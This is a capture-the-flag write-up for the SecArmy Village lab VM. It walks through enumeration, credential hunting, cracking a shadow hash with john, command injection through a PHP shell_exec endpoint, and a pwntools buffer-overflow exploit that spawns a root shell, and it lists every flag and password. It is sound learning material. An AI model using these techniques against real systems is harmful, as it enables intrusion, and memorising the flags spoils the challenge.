SecArmy OSCP Giveaway CTF Writeup

This was a CTF event created for the SecArmy Village event in October 2020. Participants were required to download a virtual machine from here and solve all challenges for a chance to receive an OSCP voucher as a reward.

Overall it was a fun event. The challenges were mostly basics and the format was fun! I was in the first 100 to complete all challenges but I did not get an OSCP voucher for completing it unfortunately. I still really enjoyed the event and I want to share my writeup so it does not go to waste. Maybe you'll learn something from it too! So here it goes:

As always we do a simple Nmap scan first thing.

nmap 192.168.1.12

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:83:DD:F6 (VMware)

Flag1:

We start manually enumerating the webpage having a look around and we get a hint saying we should enumerate directories.

Throwing ffuf at it:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -u 192.168.1.12/FUZZ

We get a hit for a directory /anon

We are told that we are given the credentials but they don't seem to be in plain sight, so examining the source code of the webapp using ctrl+U we find the first set of credentials:

uno:luc10r4m0n

Since we have not found any login panels on the webapp we try the other login alternatives being SSH and FTP.

Both will serve us for grabbing the first flag. SSH is just more useful for the next steps so we go with that

ssh uno@192.168.1.12

with uno's password we log in to ssh and cat the first flag.

Flag2:

Now with SSH access as uno user we cat the readme.txt in his home directory and see that we are given a password. We take a guess that it will be for the next user which logically will be dos as that is two in spanish... There is a theme going on here by now in case you haven't noticed.

We can either SSH as dos with that new password 4b3l4rd0fru705 or just do su dos and enter his password to use the same SSH session we are on.

In our new user's home directory we find a directory named files and then a readme.txt and 1337.txt

Having a look at the text files first we see that 1337.txt seems to hint at a service running on port 1337 that we can use netcat to interact with.

Our netcat application is too 1337 to handle..

Looking at readme.txt as well we see we are given a task:

You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a

We can use some grep-fu to do this quickly.

grep -r -e a8211ac1853a1235d48829414626512a files

This gives us:

files/file4444.txt:a8211ac1853a1235d48829414626512a

We read that file to see why it's so important. We are told to look at file:

file3131.txt

Looking at the file inside files/ directory we see this

UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA

It looks like base64, decoding it doesn't seem to be useful straight away, but using CyberChef and saving the binary output to a file then running the file command on it tells us it's some kind of ZIP file.

We can add both base64 (making sure to tick the Remove non alphabet chars option) followed by unzip options in CyberChef and this shows us the contents of the zip file!

This contains the flag2.txt and the todo.txt which will help us for the next part.

We grab the flag and continue.

Flag3:

todo.txt contains the following:

Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Ok, now we have a token for something but no obvious place to use it. Remember though, that we have a service running on port 1337 so let's check that out:

nc 127.0.0.1 1337

dos@svos:~/files$ nc 127.0.0.1 1337

 Welcome to SVOS Password Recovery Facility!
 Enter the super secret token to proceed: 

We can enter the token we just found here and we are given the creds for user tres

Here's your login credentials for the third user tres:r4f43l71n4j3r0

Flag4:

We use the credentials to get to tres user using su tres then his password. We cat the flag in the new home directory and continue.

We find a secarmy-village binary and a readme.txt in this directory. We are given the instruction to reverse engineer the binary to progress. As a first attempt at getting lucky, we can use strings to try and see if what we need is hardcoded in the file.

We see something that fits the pattern of previous passwords using the command strings secarmy-village.

o:p3dr00l1v4r3zct

We can take a guess with this and see if it works as a password for the next user.

We try some combinations of it and see that p3dr00l1v4r3z works to login to cuatro user. This gets us the 4th flag.

Flag5:

The todo.txt file in this home directory tells us to check out /justanothergallery on the web application.

We are presented with what looks like a carousel of images with QR codes. Testing to see if they provide any useful content with our phone shows some words.

We can use this big brain bash oneliner to grab each QR code and then examine it - thanks to @swinefloo for this bash-fu.

for i in $(seq 1 68); do zbarimg "http://192.168.12.129/justanothergallery/qr/image-$i.png" | tee -a output; done && cat output | grep "QR-Code"

One of the QR codes towards the last ones contains the creds for the next user:

QR-Code:cinco:ruy70m35

We can su cinco with that password and we can cat flag5.txt from here.

Flag6:

For this we will need to enumerate a little around the filesystem. The readme.txt tells us to look at secret places elsewhere. So we can either do it manually or run linpeas.sh for example which will show us a directory:

/cincos-secrets

We see a hint.txt and shadow.bak file. This has the same format as a shadow file and we can try and crack it.

We first have to chmod 600 shadow.bak and now we can cat it and throw it at john or hashcat:

hash.txt will contain

seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.

john hash.txt --wordlist=/usr/share/rockyou.txt

This yields the password Hogwarts which we can use to su seis and get the flag.

Flag7:

We see a readme.txt which tells us to visit a directory in the web application:

head over to /shellcmsdashboard webpage and find the credentials!

We see a login panel and in the source code a reference to index.php. This will likely contain the auth check so we can look at /var/www/html/shellcmsdashboard to see if we can figure out how it works and how to bypass the login.

index.php snippet:

<?php
$user = $_POST["emanresu"];
$pass = $_POST["drowssap"];
if(strcmp($user,"admin") == 0){
  if(strcmp($pass,"qwerty")== 0){
   echo "<center>head over to /aabbzzee.php</center>";
 }
}
?>

We see that the credentials are hardocded so we just use them to login: admin:qwerty

Although this doesn't really do anything but reveal a path in the front end. We can also just ignore the login and go to the new path:

http://192.168.12.129/shellcmsdashboard/aabbzzee.php

Once again we have access to the php code of this endpoint through the box /var/www/ directories so we see that the php looks something like this:

<?php
    if(isset($_POST['comm']))
    {
        $cmd = $_POST['comm'];
        echo "<center>";
        echo shell_exec($cmd);
        echo"</center>";
    }
?>

We can inject system commands in a POST request with the comm parameter. Simply intercepting the request with burp and then changing the command to

comm=ls -la

We find a readme9213.txt file. The perms on it don't let us read it so we can use the injection to chmod it first then read it.

comm=chmod 777 readme9213.txt

Then:

comm=cat readme9213.txt

From this file we get the password for user siete:

password for the seventh user is 6u1l3rm0p3n473

We su siete with his password and get the flag.

Flag8:

For this one we are given an array of what seem like bytes in hex representation and a file called key.txt as well as a go code snippet. It appears as though it is doing something with char() so it's likely that the bytes just translate to ascii when tampered with in the correct way.

Trying some basic CTF ideas like, bit shifting, addition, subtraction, etc.. We finally find that using XOR with the key and ord() gets us valid ascii characters that form a password string. This python code solves this challenge:

chars = [11,29,27,25,10,21,1,0,23,10,17,12,13,8]
key = "x"

newchars = []
for i in chars:
    newchars.append(ord(key) ^ i)

print(newchars)

s = []
out = ""
for i in newchars:
    s.append(chr(i))
    out += chr(i)

print(s)
print(out)

This password is used to unzip the password.zip file in siete's home directory.

This gives us the password to move onto user ocho

m0d3570v1ll454n4

Flag9:

We find a pcapng file in our directory and know we might have to analyze traffic. Let's be lazy first though and try and strings it and see if we see anything.

We find a line that stands out saying:

READING IS NOT IMPORTANT, HERE IS WHAT YOU WANT: mjwfr?2b6j3a5fx/

This does not get us to next user though. If we read the text where we found this, we can get a hint to try different things with keyboard layouts etc.

Using dcode.fr keyboard shift from here and default settings:

https://www.dcode.fr/chiffre-decalage-clavier

We see that the 6th result down shifting the text gives us creds for user nine

nueve:355u4z4rc0

we su nueve and get the 9th flag.

Flag10:

This was pwn challenge that could be solved in 3 possible ways. The easiest which was done here, was to simply throw the binary in ghidra and see that it is looking for an address in memory being 0xcafebabe. Next, we use gdb-peda to debug where our payload lands and to find our offsets.

with an offset of 24 followed by the address 0xcafebabe the program calls setuid() and spawns a bash shell as root.

The exploit code used in this challenge is below:

from pwn import *

p = process('orangutan')

payload = b'A'*24
payload += p32(0xcafebabe)
# payload += p32(0x0000000000400827) #different way which skips the cmp

p.recvline()
pause()
p.sendline(payload)
p.recv()
p.interactive()

This was run locally from the remote box by installing pwntools in it as doing it through SSH was tedious and threw errors.

The other much different way to solve this would be a ret2libc, but I will let you figure that one out for yourself :)

We are now root and completed the box.

Flags:

flag1{fb9e88}
flag2{624a21}
flag3{ac66cf}
flag4{1d6b06}
flag5{b1e870}
flag6{779a25}
flag7{d5c26a}
flag8{5bcf53}
flag9{689d3e}
flag10{33c9661bfd}

There it is. Hopefully you learnt a thing or two, or at least got some enjoyment out of reading the path to pwn this box. Until next time!